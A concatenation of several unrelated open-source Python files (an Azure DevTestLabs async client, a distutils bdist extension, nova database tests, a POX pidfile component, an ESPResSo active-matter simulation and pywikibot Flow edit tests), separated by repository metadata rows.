return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/users/{userName}/servicefabrics/{name}'} # type: ignore
async def update(
self,
resource_group_name: str,
lab_name: str,
user_name: str,
name: str,
service_fabric: "_models.ServiceFabricFragment",
**kwargs
) -> "_models.ServiceFabric":
"""Allows modifying tags of service fabrics. All other properties will be ignored.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param lab_name: The name of the lab.
:type lab_name: str
:param user_name: The name of the user profile.
:type user_name: str
:param name: The name of the service fabric.
:type name: str
:param service_fabric: A Service Fabric.
:type service_fabric: ~azure.mgmt.devtestlabs.models.ServiceFabricFragment
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ServiceFabric, or the result of cls(response)
:rtype: ~azure.mgmt.devtestlabs.models.ServiceFabric
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ServiceFabric"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-09-15"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'userName': self._serialize.url("user_name", user_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(service_fabric, 'ServiceFabricFragment')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ServiceFabric', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/users/{userName}/servicefabrics/{name}'} # type: ignore
async def list_applicable_schedules(
self,
resource_group_name: str,
lab_name: str,
user_name: str,
name: str,
**kwargs
) -> "_models.ApplicableSchedule":
"""Lists the applicable start/stop schedules, if any.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param lab_name: The name of the lab.
:type lab_name: str
:param user_name: The name of the user profile.
:type user_name: str
:param name: The name of the service fabric.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ApplicableSchedule, or the result of cls(response)
:rtype: ~azure.mgmt.devtestlabs.models.ApplicableSchedule
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ApplicableSchedule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-09-15"
accept = "application/json"
# Construct URL
url = self.list_applicable_schedules.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'userName': self._serialize.url("user_name", user_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ApplicableSchedule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_applicable_schedules.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/users/{userName}/servicefabrics/{name}/listApplicableSchedules'} # type: ignore
async def _start_initial(
self,
resource_group_name: str,
lab_name: str,
user_name: str,
name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-09-15"
accept = "application/json"
# Construct URL
url = self._start_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'userName': self._serialize.url("user_name", user_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_start_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/users/{userName}/servicefabrics/{name}/start'} # type: ignore
async def begin_start(
self,
resource_group_name: str,
lab_name: str,
user_name: str,
name: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Start a service fabric. This operation can take a while to complete.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param lab_name: The name of the lab.
:type lab_name: str
:param user_name: The name of the user profile.
:type user_name: str
:param name: The name of the service fabric.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._start_initial(
resource_group_name=resource_group_name,
lab_name=lab_name,
user_name=user_name,
name=name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'userName': self._serialize.url("user_name", user_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_start.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/users/{userName}/servicefabrics/{name}/start'} # type: ignore
async def _stop_initial(
self,
resource_group_name: str,
lab_name: str,
user_name: str,
name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-09-15"
accept = "application/json"
# Construct URL
url = self._stop_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'userName': self._serialize.url("user_name", user_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_stop_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/users/{userName}/servicefabrics/{name}/stop'} # type: ignore
async def begin_stop(
self,
resource_group_name: str,
lab_name: str,
user_name: str,
name: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Stop a service fabric This operation can take a while to complete.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param lab_name: The name of the lab.
:type lab_name: str
:param user_name: The name of the user profile.
:type user_name: str
:param name: The name of the service fabric.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._stop_initial(
resource_group_name=resource_group_name,
lab_name=lab_name,
user_name=user_name,
name=name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'userName': self._serialize.url("user_name", user_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_stop.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/users/{userName}/servicefabrics/{name}/stop'} # type: ignore
| mit | 1,448,853,584,944,195,600 | 47.302784 | 243 | 0.628191 | false |
Pikecillo/genna | external/4Suite-XML-1.0.2/Ft/Lib/DistExt/BDist.py | 1 | 2361 | import os
import sys
from distutils.command import bdist
from Ft.Lib.DistExt import Util
class BDist(bdist.bdist):
"""
Extended 'bdist' command that adds support for InnoSetup Windows installers
and Python Egg files.
"""
command_name = 'bdist'
default_format = bdist.bdist.default_format.copy()
default_format['nt'] = 'inno'
format_commands = bdist.bdist.format_commands + ['inno', 'egg']
format_command = bdist.bdist.format_command.copy()
format_command['inno'] = ('bdist_inno', 'Windows InnoSetup installer')
format_command['egg'] = ('bdist_egg', 'Python Egg file')
# Try to keep the option help the same between Python versions.
if sys.version < '2.3':
user_options = bdist.bdist.user_options + [
('skip-build', None,
"skip rebuilding everything (for testing/debugging)")
]
boolean_options = ['skip-build']
else:
user_options = bdist.bdist.user_options
boolean_options = bdist.bdist.boolean_options
# Inplace addition must not be used as it could modify the super class'
# attributes.
user_options = user_options + [
('keep-temp', 'k',
"keep the pseudo-installation tree around after " +
"creating the distribution archive"),
]
boolean_options = boolean_options + ['keep-temp']
def initialize_options(self):
bdist.bdist.initialize_options(self)
self.skip_build = False # only necessary for Python 2.2
self.keep_temp = False
return
def finalize_options(self):
self.set_undefined_options('config', ('plat_name', 'plat_name'))
if self.bdist_base is None:
build_base = self.get_finalized_command('build').build_base
bdist_base = 'bdist.' + self.plat_name + '-' + sys.version[:3]
self.bdist_base = os.path.join(build_base, bdist_base)
bdist.bdist.finalize_options(self)
for format in self.formats:
if format not in self.format_command:
raise DistutilsOptionError("invalid format '%s'" % format)
return
sub_commands = []
for format in format_commands:
command, description = format_command[format]
if command not in dict(sub_commands):
sub_commands.append((command, lambda self: False))
| gpl-2.0 | -4,524,352,369,091,695,000 | 33.217391 | 79 | 0.626853 | false |
gooddata/openstack-nova | nova/tests/functional/db/test_connection_switch.py | 6 | 8666 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from oslo_utils.fixture import uuidsentinel as uuids
from oslo_utils import uuidutils
from nova import context
from nova import exception
from nova import objects
from nova import test
from nova.tests import fixtures as nova_fixtures
class ConnectionSwitchTestCase(test.NoDBTestCase):
USES_DB_SELF = True
test_filename = 'foo.db'
fake_conn = 'sqlite:///' + test_filename
def setUp(self):
super(ConnectionSwitchTestCase, self).setUp()
self.addCleanup(self.cleanup)
self.useFixture(nova_fixtures.Database(database='api'))
self.useFixture(nova_fixtures.Database(database='main'))
# Use a file-based sqlite database so data will persist across new
# connections
# The 'main' database connection will stay open, so in-memory is fine
self.useFixture(nova_fixtures.Database(connection=self.fake_conn))
def cleanup(self):
try:
os.remove(self.test_filename)
except OSError:
pass
def test_connection_switch(self):
ctxt = context.RequestContext('fake-user', 'fake-project')
# Make a request context with a cell mapping
mapping = objects.CellMapping(context=ctxt,
uuid=uuidutils.generate_uuid(),
database_connection=self.fake_conn,
transport_url='none:///')
mapping.create()
# Create an instance in the cell database
uuid = uuidutils.generate_uuid()
with context.target_cell(ctxt, mapping) as cctxt:
# Must set project_id because instance get specifies
# project_only=True to model_query, which means non-admin
# users can only read instances for their project
instance = objects.Instance(context=cctxt, uuid=uuid,
project_id='fake-project')
instance.create()
# Verify the instance is found in the cell database
inst = objects.Instance.get_by_uuid(cctxt, uuid)
self.assertEqual(uuid, inst.uuid)
# Verify the instance isn't found in the main database
self.assertRaises(exception.InstanceNotFound,
objects.Instance.get_by_uuid, ctxt, uuid)
class CellDatabasesTestCase(test.NoDBTestCase):
USES_DB_SELF = True
def setUp(self):
super(CellDatabasesTestCase, self).setUp()
self.useFixture(nova_fixtures.Database(database='api'))
fix = nova_fixtures.CellDatabases()
fix.add_cell_database('cell0')
fix.add_cell_database('cell1')
fix.add_cell_database('cell2')
self.useFixture(fix)
self.context = context.RequestContext('fake-user', 'fake-project')
def _create_cell_mappings(self):
cell0_uuid = objects.CellMapping.CELL0_UUID
self.mapping0 = objects.CellMapping(context=self.context,
uuid=cell0_uuid,
database_connection='cell0',
transport_url='none:///')
self.mapping1 = objects.CellMapping(context=self.context,
uuid=uuidutils.generate_uuid(),
database_connection='cell1',
transport_url='none:///')
self.mapping2 = objects.CellMapping(context=self.context,
uuid=uuidutils.generate_uuid(),
database_connection='cell2',
transport_url='none:///')
self.mapping0.create()
self.mapping1.create()
self.mapping2.create()
def test_cell_dbs(self):
self._create_cell_mappings()
# Create an instance and read it from cell1
uuid = uuidutils.generate_uuid()
with context.target_cell(self.context, self.mapping1) as cctxt:
instance = objects.Instance(context=cctxt, uuid=uuid,
project_id='fake-project')
instance.create()
inst = objects.Instance.get_by_uuid(cctxt, uuid)
self.assertEqual(uuid, inst.uuid)
# Make sure it can't be read from cell2
with context.target_cell(self.context, self.mapping2) as cctxt:
self.assertRaises(exception.InstanceNotFound,
objects.Instance.get_by_uuid, cctxt, uuid)
# Make sure it can still be read from cell1
with context.target_cell(self.context, self.mapping1) as cctxt:
inst = objects.Instance.get_by_uuid(cctxt, uuid)
self.assertEqual(uuid, inst.uuid)
# Create an instance and read it from cell2
uuid = uuidutils.generate_uuid()
with context.target_cell(self.context, self.mapping2) as cctxt:
instance = objects.Instance(context=cctxt, uuid=uuid,
project_id='fake-project')
instance.create()
inst = objects.Instance.get_by_uuid(cctxt, uuid)
self.assertEqual(uuid, inst.uuid)
# Make sure it can't be read from cell1
with context.target_cell(self.context, self.mapping1) as cctxt:
self.assertRaises(exception.InstanceNotFound,
objects.Instance.get_by_uuid, cctxt, uuid)
def test_scatter_gather_cells(self):
self._create_cell_mappings()
# Create an instance in cell0
with context.target_cell(self.context, self.mapping0) as cctxt:
instance = objects.Instance(context=cctxt, uuid=uuids.instance0,
project_id='fake-project')
instance.create()
# Create an instance in first cell
with context.target_cell(self.context, self.mapping1) as cctxt:
instance = objects.Instance(context=cctxt, uuid=uuids.instance1,
project_id='fake-project')
instance.create()
# Create an instance in second cell
with context.target_cell(self.context, self.mapping2) as cctxt:
instance = objects.Instance(context=cctxt, uuid=uuids.instance2,
project_id='fake-project')
instance.create()
filters = {'deleted': False, 'project_id': 'fake-project'}
results = context.scatter_gather_all_cells(
self.context, objects.InstanceList.get_by_filters, filters,
sort_dir='asc')
instances = objects.InstanceList()
for result in results.values():
instances = instances + result
# Should have 3 instances across cells
self.assertEqual(3, len(instances))
# Verify we skip cell0 when specified
results = context.scatter_gather_skip_cell0(
self.context, objects.InstanceList.get_by_filters, filters)
instances = objects.InstanceList()
for result in results.values():
instances = instances + result
# Should have gotten only the instances from the last two cells
self.assertEqual(2, len(instances))
self.assertIn(self.mapping1.uuid, results)
self.assertIn(self.mapping2.uuid, results)
instance_uuids = [inst.uuid for inst in instances]
self.assertIn(uuids.instance1, instance_uuids)
self.assertIn(uuids.instance2, instance_uuids)
# Try passing one cell
results = context.scatter_gather_cells(
self.context, [self.mapping1], 60,
objects.InstanceList.get_by_filters, filters)
instances = objects.InstanceList()
for result in results.values():
instances = instances + result
# Should have gotten only one instance from cell1
self.assertEqual(1, len(instances))
self.assertIn(self.mapping1.uuid, results)
self.assertEqual(uuids.instance1, instances[0].uuid)
| apache-2.0 | -7,959,131,255,602,167,000 | 42.114428 | 78 | 0.602469 | false |
twood02/adv-net-samples | sdn/pox/pox/misc/pidfile.py | 44 | 2096 | # Copyright 2013 James McCauley
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Component to create PID files for running POX as a service
"""
from pox.core import core
import os
import atexit
_files = set()
_first_init = False
def _del_pidfiles ():
if not _files: return
try:
msg = "Cleaning up %i pidfile" % (len(_files),)
if len(_files) != 1: msg += 's'
log.debug(msg)
except:
pass
for f in list(_files):
shortname = f
if os.path.abspath(os.path.basename(f)) == f:
shortname = os.path.basename(f)
try:
os.remove(f)
except:
msg = "Couldn't delete pidfile '%s'" % (shortname,)
try:
log.exception(msg)
except:
print(msg)
_files.remove(f)
def _handle_DownEvent (event):
_del_pidfiles()
def launch (file, force = False, __INSTANCE__ = None):
global log
log = core.getLogger()
absfile = os.path.abspath(file)
if absfile in _files:
log.warn("pidfile '%s' specified multiple times", file)
return
global _first_init
if not _first_init:
try:
atexit.register(_del_pidfiles)
except:
log.info('atexit not available')
core.addListenerByName("DownEvent", _handle_DownEvent)
_first_init = True
if os.path.exists(absfile) and not force:
log.error("Aborting startup: pidfile '%s' exists "
"(use --force to override)", file)
return False
try:
f = open(absfile, 'w')
f.write("%s\n" % (os.getpid(),))
except:
log.exception("Failed to create pidfile '%s'", file)
return False
f.close()
_files.add(absfile)
| mit | 839,814,898,453,746,300 | 22.550562 | 74 | 0.650286 | false |
espressomd/espresso | doc/tutorials/active_matter/solutions/rectification_simulation.py | 2 | 6624 | #
# Copyright (C) 2010-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##########################################################################
#
# Active Matter: Rectification Tutorial
#
##########################################################################
import numpy as np
import os
import argparse
import espressomd
from espressomd import assert_features
import espressomd.shapes
import espressomd.math
assert_features(["ENGINE", "LENNARD_JONES", "ROTATION", "MASS"])
# Quaternion procedure
def a2quat(phi, theta):
q1w = np.cos(theta / 2.0)
q1x = 0
q1y = np.sin(theta / 2.0)
q1z = 0
q2w = np.cos(phi / 2.0)
q2x = 0
q2y = 0
q2z = np.sin(phi / 2.0)
q3w = (q1w * q2w - q1x * q2x - q1y * q2y - q1z * q2z)
q3x = (q1w * q2x + q1x * q2w - q1y * q2z + q1z * q2y)
q3y = (q1w * q2y + q1x * q2z + q1y * q2w - q1z * q2x)
q3z = (q1w * q2z - q1x * q2y + q1y * q2x + q1z * q2w)
return [q3w, q3x, q3y, q3z]
##########################################################################
parser = argparse.ArgumentParser()
parser.add_argument("vel", type=float, help="Velocity of active particles.")
args = parser.parse_args()
vel = args.vel
##########################################################################
# create an output folder
outdir = "./RESULTS_RECTIFICATION"
os.makedirs(outdir, exist_ok=True)
# Setup the box (we pad the geometry to make sure
# the constraints are away from the edges of the box)
LENGTH = 100
DIAMETER = 20
PADDING = 2
PROD_STEPS = 500
PROD_LENGTH = 500
TIME_STEP = 0.005
# Setup the MD parameters
BOX_L = np.array(
[LENGTH + 2 * PADDING,
DIAMETER + 2 * PADDING,
DIAMETER + 2 * PADDING])
system = espressomd.System(box_l=BOX_L)
system.cell_system.skin = 0.1
system.time_step = TIME_STEP
system.min_global_cut = 0.5
system.thermostat.set_langevin(kT=1.0, gamma=1.0, seed=42)
##########################################################################
#
# Here we use exactly the same parameters for the geometry of the constraints
# that was used for the LB boundaries. This can be done, since the distance
# function used for the constraints is the same as the one used for the
# LB boundaries.
#
##########################################################################
cylinder = espressomd.shapes.Cylinder(
center=0.5 * BOX_L,
axis=[1, 0, 0], radius=DIAMETER / 2.0, length=LENGTH, direction=-1)
system.constraints.add(shape=cylinder, particle_type=1)
# Setup walls
wall = espressomd.shapes.Wall(dist=PADDING, normal=[1, 0, 0])
system.constraints.add(shape=wall, particle_type=1)
wall = espressomd.shapes.Wall(dist=-(LENGTH + PADDING), normal=[-1, 0, 0])
system.constraints.add(shape=wall, particle_type=1)
# Setup cone
IRAD = 4.0
ANGLE = np.pi / 4.0
ORAD = (DIAMETER - IRAD) / np.sin(ANGLE)
SHIFT = 0.25 * ORAD * np.cos(ANGLE)
ctp = espressomd.math.CylindricalTransformationParameters(
axis=[-1, 0, 0], center=[BOX_L[0] / 2.0 - 1.3 * SHIFT, BOX_L[1] / 2.0, BOX_L[2] / 2.0])
hollow_cone = espressomd.shapes.HollowConicalFrustum(
cyl_transform_params=ctp,
r1=ORAD, r2=IRAD, thickness=2.0, length=18,
direction=1)
system.constraints.add(shape=hollow_cone, particle_type=1)
##########################################################################
#
# We set up a WCA (almost-hard) interaction between the particles and the
# confining geometry. We do not have particle-particle interactions, which
# are not necessary to observe rectification.
#
##########################################################################
SIGMA = 0.5
CUTOFF = 1.12246 * SIGMA
EPSILON = 1
SHIFT = 0.25
system.non_bonded_inter[0, 1].lennard_jones.set_params(
epsilon=EPSILON, sigma=SIGMA, cutoff=CUTOFF, shift=SHIFT)
##########################################################################
#
# Setup the particles. We put them all in two points one in each chamber
# and give them random directions. This speeds up the equilibration, since
# putting them all in a single chamber, would make it take a long time to
# observe the effect of rectification. Note that they need to be able to
# rotate freely, hence the command rotation=[1,1,1] is provided
#
##########################################################################
N_PART = 500
for cntr in range(N_PART):
if cntr % 2 == 0:
x = 0.25 * BOX_L[0]
else:
x = 0.75 * BOX_L[0]
y = BOX_L[1] / 2.
z = BOX_L[2] / 2.
theta = float(np.random.random() * np.pi)
phi = float(2 * np.random.random() * np.pi)
quats = a2quat(theta, phi)
system.part.add(pos=[x, y, z], type=0, swimming={'v_swim': vel},
quat=quats, rotation=[1, 1, 1])
##########################################################################
# Equilibrate
system.integrator.run(25 * PROD_LENGTH)
# Output the CMS coordinates
with open("{}/CMS_{}.dat".format(outdir, vel), "w") as outfile:
print("####################################################", file=outfile)
print("# time CMS x coord average CMS #", file=outfile)
print("####################################################", file=outfile)
# Production run
dev_sum = 0.0
dev_av = 0.0
system.time = 0.
for i in range(PROD_STEPS):
if (i + 1) % 5 == 0:
print('\rprogress: %.0f%%' % ((i + 1) * 100. / PROD_STEPS),
end='', flush=True)
# We output the coordinate of the center of mass in
# the direction of the long axis, here we consider
# the deviation from the center (keep the padding in mind)
dev = system.galilei.system_CMS()[0] - 0.5 * BOX_L[0]
if i > 0:
dev_sum = dev_sum + dev
dev_av = dev_sum / i
print("{} {} {}".format(system.time, dev, dev_av), file=outfile)
system.integrator.run(PROD_LENGTH)
print()
# Output the final configuration
system.part.writevtk("{}/points_{}.vtk".format(outdir, vel), types=[0])
| gpl-3.0 | -5,037,754,540,907,154,000 | 30.393365 | 91 | 0.565368 | false |
PersianWikipedia/pywikibot-core | tests/flow_edit_tests.py | 2 | 11105 | # -*- coding: utf-8 -*-
"""Edit tests for the flow module."""
#
# (C) Pywikibot team, 2015-2019
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, division, unicode_literals
from pywikibot.exceptions import LockedPage
from pywikibot.flow import Board, Topic, Post
from pywikibot.tools import UnicodeType as unicode
from tests.aspects import TestCase
from tests import unittest
class TestFlowCreateTopic(TestCase):
"""Test the creation of Flow topics."""
family = 'wikipedia'
code = 'test'
user = True
write = True
def test_create_topic(self):
"""Test creation of topic."""
content = 'If you can read this, the Flow code in Pywikibot works!'
board = Board(self.site, 'Talk:Pywikibot test')
topic = board.new_topic('Pywikibot test', content, 'wikitext')
first_post = topic.replies()[0]
wikitext = first_post.get(format='wikitext')
self.assertIn('wikitext', first_post._content)
self.assertNotIn('html', first_post._content)
self.assertIsInstance(wikitext, unicode)
self.assertEqual(wikitext, content)
class TestFlowReply(TestCase):
"""Test replying to existing posts."""
family = 'wikipedia'
code = 'test'
user = True
write = True
@classmethod
def setUpClass(cls):
"""Set up class."""
super(TestFlowReply, cls).setUpClass()
cls._topic_title = 'Topic:Stf56oxx0sd4dkj1'
def test_reply_to_topic(self):
"""Test replying to "topic" (really the topic's root post)."""
# Setup
content = 'I am a reply to the topic. Replying works!'
topic = Topic(self.site, self._topic_title)
old_replies = topic.replies(force=True)[:]
# Reply
reply_post = topic.reply(content, 'wikitext')
# Test content
wikitext = reply_post.get(format='wikitext')
self.assertIn('wikitext', reply_post._content)
self.assertNotIn('html', reply_post._content)
self.assertIsInstance(wikitext, unicode)
self.assertEqual(wikitext, content)
# Test reply list in topic
new_replies = topic.replies(force=True)
self.assertLength(new_replies, len(old_replies) + 1)
def test_reply_to_topic_root(self):
"""Test replying to the topic's root post directly."""
# Setup
content = ("I am a reply to the topic's root post. "
'Replying still works!')
topic = Topic(self.site, self._topic_title)
topic_root = topic.root
old_replies = topic_root.replies(force=True)[:]
# Reply
reply_post = topic_root.reply(content, 'wikitext')
# Test content
wikitext = reply_post.get(format='wikitext')
